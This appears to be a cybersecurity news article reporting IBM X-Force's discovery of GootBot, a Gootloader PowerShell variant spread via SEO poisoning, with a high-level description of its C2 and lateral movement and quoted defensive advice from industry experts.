In a recent discovery, the IBM X-Force research team has detected a fresh iteration of the notorious Gootloader malware, christened as “GootBot.” This malware exhibits stealthy lateral movement capabilities, making it a challenging adversary for detection and prevention within corporate networks.
As revealed in a blog post by Golo Mühr and Ole Villadsen, the Gootloader group has introduced their custom bot, GootBot, into the later stages of their attack chain. This strategic move is aimed at eluding detection, employing readily available tools such as RDP (Remote Desktop Protocol) or CobaltStrike for command and control (C2) communication.
Initially, Gootloader malware served as an initial access tool, but it has undergone substantial evolution to now include GootBot, a lightweight obfuscated PowerShell script. GootBot is typically downloaded following a Gootloader infection and operates by receiving commands via C2 communication, facilitated through encrypted PowerShell scripts.
The origins of the Gootloader group, also known as UNC2565 or Hive0127, date back to 2014 when they initially focused on deploying SEO poisoning techniques and compromising WordPress websites to distribute the Gootkit-based Gootloader malware. Melissa Bischoping, Tanium’s director of endpoint security research, explained the mechanics of SEO poisoning, emphasizing that it manipulates search results for specific keywords to lead users to malicious content. This technique plays on the mistaken belief that highly ranked search results guarantee the safety of a website, thereby exploiting a user’s trust in search engine rankings.
The group often targets business-related search queries, using legitimate-looking websites optimized to appear on the first page of search results. Once users visit these deceptive pages, they are coaxed into downloading seemingly innocuous archive files that, in reality, conceal the Gootloader malware.
In March 2021, the cybersecurity firm Sophos confirmed that Gootloader had evolved into a sophisticated loader framework, transitioning from being a mere initial access point. It was revealed that the delivery methods had expanded beyond the Gootkit malware family, with Gootloader being employed by numerous threat groups, including ransomware affiliates and additional payloads like SystemBC and IcedID.
GootBot, a novel variant of Gootloader, presents itself as a PowerShell payload, encapsulating a single C2 server address. It employs string replacements for mild obfuscation, akin to its predecessor Gootloader. The malware sends GET requests to the C2 server, requesting PowerShell tasks and receiving Base64-encoded payloads, with the last eight digits of the code denoting the task’s name. These payloads are decoded and injected into script blocks before execution, functioning asynchronously with a default beaconing interval of 60 seconds. Completed tasks are reported as results in the next loop iteration.
Notably, GootBot is designed to facilitate lateral movement within networks. Its C2 infrastructure can efficiently generate multiple GootBot payloads, each featuring a distinct C2 address, thereby enabling the infection of multiple hosts. It also conducts reconnaissance and assigns a unique GootBot ID for each host.
This versatile malware empowers attackers to rapidly propagate across compromised networks, with the ability to deploy additional malicious software. In contrast to Gootloader, GootBot leverages infected domains to reach the domain controller, signifying a shift in attack tactics. This shift enhances the success rate of post-exploitation stages, particularly in Gootloader-based ransomware affiliate activities.
GootBot exhibits the capability to extract valuable information, including domain user names, OS details from the registry key, and various system-related data. This information is then formatted with a specified ID.
The emergence of the GootBot variant underscores the fact that threat actors are employing increasingly sophisticated methods to maintain their stealth and spread laterally across networks. Such lateral-movement scripts encompass various techniques, including WinRM, SMB, and WinAPI calls, enabling the propagation of payloads to other hosts.
In the face of the persistent Gootloader threat, organizations are being urged to bolster their defenses with advanced security methods. This includes implementing endpoint detection and response (EDR) solutions and staying vigilant by keeping software up to date to fend off the looming danger.
Casey Ellis, the founder and chief strategy officer of cybersecurity firm Bugcrowd, weighed in on the current Gootloader campaign, characterizing it as a well-organized and considerate “initial access broker” (IAB). The deployment of malicious SEO (Search Engine Optimization) tactics, despite not being highly targeted, fits the opportunistic nature of an IAB’s attack strategy. Ellis highlights the evolving landscape of organized cybercrime, which now includes the adoption of a long-term and wide-reaching approach by threat actors.
Darren Guccione, CEO and co-founder of Keeper Security, underscores the challenges that innocent users face when trying to distinguish between legitimate and counterfeit search results. This challenge is what makes SEO poisoning so effective. Guccione points out that individuals who lack expertise in SEO and SEO-related attack methods often focus on the visual elements of search results, such as domain names and logos. Threat actors often employ persuasive language like “Official Website” to entice users into clicking on potentially hazardous links or visiting fake websites capable of delivering Gootloader or other malware to their devices.
However, Guccione recommends exercising scrutiny when evaluating websites. He suggests that counterfeit or spoofed websites often have website addresses that differ from the official company name and may use different domain extensions compared to legitimate websites. A majority of reputable websites typically employ the .com domain extension, making deviations from this norm a potential warning sign. In situations of uncertainty, exercising caution and refraining from clicking on any links is a wise course of action. Guccione also highlights the utility of online tools like the Google Transparency Report, which can assist in determining the safety of a website. These precautions are vital in an environment where the Gootloader threat persists, underscoring the importance of vigilance and advanced security measures to protect organizations and individuals from cyberattacks.